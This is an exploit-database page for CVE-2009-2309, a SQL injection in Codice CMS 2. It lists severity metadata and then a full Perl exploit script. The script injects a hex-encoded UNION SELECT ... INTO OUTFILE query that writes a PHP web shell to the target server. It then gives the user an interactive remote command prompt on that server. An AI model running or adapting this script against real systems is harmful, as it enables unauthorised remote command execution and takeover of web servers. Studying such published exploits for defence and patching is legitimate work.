Codice CMS 2 Remote SQL Command Execution

2009-07-05 / 2009-07-06
Credit: darkjoker
Risk: High
Local: No
Remote: Yes
CVE: CVE-2009-2309
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

#--+++===========================================================+++-- #--+++====== Codice CMS 2 Remote Command Execution Exploit ======+++-- #--+++===========================================================+++-- #!/usr/bin/perl use strict; use warnings; use IO::Socket; sub banner { print "--+++===========================================================+++--\n". "--+++====== Codice CMS 2 Remote Command Execution Exploit ======+++--\n". "--+++===========================================================+++--\n\n"; } sub usage { die "\n[+] Author : darkjoker". "\n[+] Site : http://darkjoker.net23.net". "\n[+] Download: http://freefr.dl.sourceforge.net/sourceforge/codice/codice-dev-prev.zip". "\n[+] Usage : perl $0 <hostname> <path>". "\n[+] Ex. : perl $0 localhost /codiceCMS". "\n[+] 22-03-2009 Gigi D'Agostino allo Chalet, parco del Valentino, Torino!!". "\n\n"; } sub dec2hex { my $num = $_ [0]; my $hex = sprintf ("%x", $num); return $hex; } sub hex_format { my $i = 0; my $hex; my @string = split '', $_ [0]; while ($i < scalar (@string)) { $hex .= "%" . dec2hex (ord ($string [$i])); $i++; } return $hex; } sub get_script_path { my ($hostname, $path) = @_; my $sock = new IO::Socket::INET ( PeerHost => $hostname, PeerPort => 80, Proto => "tcp", ) or usage; my $get = "GET ${path}/index.php?id HTTP/1.1\r\n". "Host: ${hostname}\r\n". "Connection: Close\r\n\r\n"; print $sock $get; my $src_path; while (<$sock>) { $src_path = $1 if ($_ =~ /resource in <b>(.+?)<\/b>/); } close ($sock); return ($src_path) ? $src_path : 0; } sub create_shell { my ($hostname, $path, $query) = @_; my $sock = new IO::Socket::INET ( PeerHost => $hostname, PeerPort => 80, Proto => "tcp", ) or usage; my $get = "GET ${path}/index.php?tag=${query} HTTP/1.1\r\n". "Host: ${hostname}\r\n". "Connection: Close\r\n\r\n"; print $sock $get; close ($sock); } banner (); my ($hostname, $path) = @ARGV; usage unless ($path); my $shell_path = get_script_path ($hostname, $path); $shell_path =~ s/index\.php$/shell\.php/; my $query = 'x %\' UNION SELECT 1, \'<?php system (stripslashes($_GET[\\\'cmd\\\'])); ?>\', 3, 4, 5, 6, 7 INTO OUTFILE \''.$shell_path.'\' FROM cod_codice--'; $query = hex_format ($query); create_shell ($hostname, $path, $query); print "Remember to delete 'shell.php' before exit!\n"; while (1) { print "nobody\@${hostname} > "; my $cmd = <STDIN>; chomp $cmd; die ("Good bye!\n") if $cmd =~ /^quit$/; $cmd = hex_format ($cmd); my $sock = new IO::Socket::INET ( PeerHost => $hostname, PeerPort => 80, Proto => "tcp", ); my $req = "GET ${path}/shell.php?cmd=${cmd} HTTP/1.1\r\n". "Host: ${hostname}\r\n". "Connection: Close\r\n\r\n"; print $sock $req; my $k; while (<$sock>) { chomp $_; $_ .= "newline"; $k .= $_; } $k =~ s/^.+1\t//; $k =~ s/\t3.+$//; $k = join ("\n", split ("newline", $k)); print $k . "\n"; close ($sock); }

References:

http://www.securityfocus.com/bid/34208
http://www.milw0rm.com/exploits/8272


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top